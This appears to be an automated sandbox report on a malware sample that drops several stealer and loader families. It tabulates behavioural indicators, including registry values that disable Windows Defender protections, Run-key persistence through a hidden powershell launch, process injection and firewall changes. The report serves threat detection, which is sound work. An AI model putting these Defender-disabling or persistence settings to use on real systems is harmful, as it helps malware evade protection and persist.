Analysis Overview
SHA256
5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0
Threat Level: Known bad
The file 5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0 was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
RedLine
ZGRat
DcRat
Modifies Windows Defender Real-time Protection settings
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
Raccoon Stealer payload
Raccoon
Glupteba payload
SmokeLoader
RedLine payload
Glupteba
Downloads MZ/PE file
Drops file in Drivers directory
Modifies Windows Firewall
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Windows security modification
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 09:08
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 09:08
Reported
2023-10-26 09:11
Platform
win10v2004-20231023-en
Max time kernel
96s
Max time network
157s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5648 created 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5648 created 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5648 created 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5648 created 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ie7PL4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F3A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F3A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\88AC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\88AC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4F0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jy3uO78.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vS3cv7Ny.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ig9ND9Br.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hW6pu6vt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\uV6dJ08.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eO1iD34.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\4532.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\md5uC1Kk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\8725.exe'\"" | C:\Users\Admin\AppData\Local\Temp\8725.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2620 set thread context of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oE77FI0.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3452 set thread context of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ov9153.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3564 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4OS609Ye.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 5820 set thread context of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ea32tu8.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3248 set thread context of 5900 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 4240 set thread context of 1508 | N/A | C:\Users\Admin\AppData\Local\Temp\A4F0.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Drive Tools\is-KHOCV.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-QFFOU.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-987R3.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-E4G1J.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2P3C7.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2O18J.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-A7GGR.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-VV009.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-UTO9D.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CLEF9.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-J2OSP.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-0N1MV.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-4T2MS.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-AMF2J.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-DITDB.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-E3QTU.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-MMSQH.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-GDBKB.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-C43AH.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-KTTVU.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-RO3IL.tmp | C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\4F3A.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
